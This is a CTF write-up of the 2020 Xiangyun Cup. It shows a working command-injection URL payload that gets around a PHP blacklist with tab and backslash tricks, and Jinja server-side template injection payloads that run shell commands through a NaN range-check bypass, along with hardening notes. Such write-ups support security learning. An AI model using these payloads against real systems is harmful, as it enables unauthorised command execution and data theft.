2020 "Xiangyun Cup" Cybersecurity Competition

I did two Web challenges in the morning and then stopped; the rest were done by my juniors. Team ranking: 172

First "Xiangyun Cup" Cybersecurity Competition

Sign-in

Plain base64: decode it directly.

Command

Got second blood on this one. No extra points for it, and before long the score had dropped to cabbage price.
A bit of fuzzing showed the filter was not very extensive.
Used %09 (tab) to bypass the space filter and ca\t (backslash inside the word) to bypass the cat filter.
Then searched for the flag's location:

Result:/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/pci0000:00/0000:00:03.0/virtio0/net/eth0/flags
/sys/devices/virtual/net/dummy0/flags
/sys/devices/virtual/net/lo/flags
/sys/module/scsi_mod/parameters/default_dev_flags
/usr/share/perl/5.18.2/IO/Uncompress/AnyInflate.pm
/usr/share/perl/5.18.2/IO/Uncompress/Inflate.pm
/usr/share/perl/5.18.2/IO/Uncompress/Adapter/Inflate.pm
/usr/share/perl/5.18.2/IO/Uncompress/RawInflate.pm
/usr/share/perl/5.18.2/IO/Compress/RawDeflate.pm
/usr/share/perl/5.18.2/IO/Compress/Adapter/Deflate.pm
/usr/share/perl/5.18.2/IO/Compress/Deflate.pm
/usr/lib/perl/5.18.2/bits/waitflags.ph
/usr/lib/apache2/modules/mod_deflate.so
/etc/.findflag
/etc/.findflag/flag.txt
/etc/apache2/mods-available/deflate.conf
/etc/apache2/mods-available/deflate.load
/etc/apache2/mods-enabled/deflate.conf
/etc/apache2/mods-enabled/deflate.load
/proc/sys/kernel/sched_domain/cpu0/domain0/flags
/proc/sys/kernel/sched_domain/cpu1/domain0/flags
/proc/kpageflags
/var/lib/apache2/module/enabled_by_maint/deflate

Flag file location: /etc/.findflag/flag.txt
payload: http://eci-2zechif0ewh04tj7nhh9.cloudeci1.ichunqiu.com/index.php?url=%7Cca%5Ct%09%2Fetc%2F.find%3F%3F%3F%3F%2F%3F%3F%3F%3F.%3F%3F%3F
Only at the end did I read the challenge source and look at the filter list:

<?php
error_reporting(0);
if (isset($_GET['url'])) {
    $ip = $_GET['url'];
    // Blacklist: spaces, several shell metacharacters and common command names.
    // Tab, '|', '\' and '?' are not in the list.
    if (preg_match("/(;|'| |>|]|&| |\\$|python|sh|nc|tac|rev|more|tailf|index|php|head|nl|tail|less|cat|ruby|perl|bash|rm|cp|mv|\*|\{)/i", $ip)) {
        die("<script language='javascript' type='text/javascript'>
        alert('no no no!')
        window.location.href='index.php';</script>");
    } else if (preg_match("/.*f.*l.*a.*g.*/", $ip)) {
        // Blocks any input containing f, l, a, g in that order (a glob pattern does not)
        die("<script language='javascript' type='text/javascript'>
        alert('no flag!')
        window.location.href='index.php';</script>");
    }
    // User input is concatenated straight into the shell command
    $a = shell_exec("ping -c 4 " . $ip);
}
?>

flaskbot

The debug information (Werkzeug debugger, since the app runs with debug=True) leaked part of the source:

/usr/local/lib/python2.7/site-packages/flask/app.py

...
# From line 46 onward (tail of the "Hello" route)
    user = request.cookies.get('user')
    if user == None:
        return render_template("index.html")
    else:
        user = user.encode('utf-8')
        # name is taken straight from the client-controlled cookie
        return render_template("guess.html", name=base64.urlsafe_b64decode(user))

@app.route('/guess', methods=['POST'])
def Guess():
    user = request.cookies.get('user')
    if user == None:
        return redirect(url_for("Hello"))
    user = user.encode('utf-8')
    name = base64.urlsafe_b64decode(user)
    num = float(request.form['num'])   # float("nan") parses without error
    if(num < 0):                       # False when num is NaN
        return "Too Small"
    elif num > 1000000000.0:           # also False when num is NaN
        return "Too Large"
    else:
        # the cookie-derived name reaches render_template_string: SSTI
        return render_template_string(guessNum(num, name))

@app.errorhandler(404)
def miss(e):
    return "What are you looking for?!!".getattr(app, '__name__', getattr(app.__class__, '__name__')), 404

if __name__ == '__main__':
    f_handler = open('/var/log/app.log', 'w')
    sys.stderr = f_handler
    app.run(debug=True, host='0.0.0.0', port=8888)   # debug=True is what exposed the source

<div id="wrapper">
    <section id="main">
        <header>
            <span class="avatar"><img src="static/images/avatar.jpg" alt="" /></span>
            <h1>Guessing Robot</h1>
            <p>Hi {{ name }}.I'm good at guessing numbers!</p>
        </header>

        <hr />
        <h2>Input your Lucky Num(0.0-1000000000.0)</h2>

Later I found that when the submitted number is NaN, neither range check fires and the code in name is executed directly (server-side template injection).
Built the payload:

{{ ''.__class__.__mro__[2].__subclasses__()[258]('ls', shell=True, stdout=-1).communicate()[0].strip() }}

Fuzzing showed that *, ? and flag were filtered, so I built this payload instead:

{{ ''.__class__.__mro__[2].__subclasses__()[258]('cat /super_secret_fl\\ag.txt', shell=True, stdout=-1).communicate()[0].strip() }}
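The root cause is the range check in Guess(): float() accepts "nan", "inf" and oversized literals such as "1e999", and every ordered comparison against NaN is False, so "nan" falls through to the render branch. The snippet below (an added example, not the challenge's code) reproduces that check next to a hardened validator that rejects non-finite values and states the allowed range positively; the function names and return strings are my own.

```python
import math

def vulnerable_check(raw: str) -> str:
    """The range check as it appears in the leaked Guess() route."""
    num = float(raw)              # float("nan") and float("inf") parse fine
    if num < 0:                   # False for NaN
        return "Too Small"
    elif num > 1000000000.0:      # False for NaN, so NaN lands in the else branch
        return "Too Large"
    else:
        return "render"           # stands in for render_template_string(guessNum(num, name))

def hardened_check(raw: str) -> str:
    """Hardened validator: strict parse, explicit non-finite rejection, positive range."""
    try:
        num = float(raw)
    except (TypeError, ValueError):
        return "Invalid"
    # math.isfinite() is False for nan, inf and -inf, which closes the NaN hole.
    if not math.isfinite(num):
        return "Invalid"
    # Express the accepted interval directly instead of listing rejected cases.
    if not (0.0 <= num <= 1000000000.0):
        return "Out of range"
    return "render"

if __name__ == "__main__":
    # Constructed probes: ordinary values plus the special floats float() accepts.
    for probe in ["42", "-1", "1e999", "nan", "inf", "abc"]:
        print(f"{probe!r:8} vulnerable={vulnerable_check(probe) if probe != 'abc' else 'ValueError':10} hardened={hardened_check(probe)}")
```

Note that validating num does not remove the template injection itself: name still comes from the cookie, so the template must treat it as data (a Jinja variable) rather than building template source from it.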

Binary Inversion

Wrote a crappy bit-flipping script for a junior:

# Flip every '0' to '1' and every '1' to '0' in ./flag, writing the result to ./output.
# Any other character (newlines included) is copied through unchanged.
# (The original opened the output with mode "w+c", which is not a valid mode.)
with open("./flag") as infile, open("./output", "w") as output:
    for line in infile:
        for ch in line:
            if ch == '0':
                ch = '1'
            elif ch == '1':
                ch = '0'
            output.write(ch)

Final grumble

It feels like flag trading ("py") has become the norm in CTFs now, and the challenges are highly repetitive; for many of them you can find near-identical ones online. Playing CTFs no longer has the spirit of exploration it used to. These days it is more or less: solve a few challenges that don't waste time, wait for the write-ups on the rest that look interesting, and call the competition done.


© 2021. All rights reserved.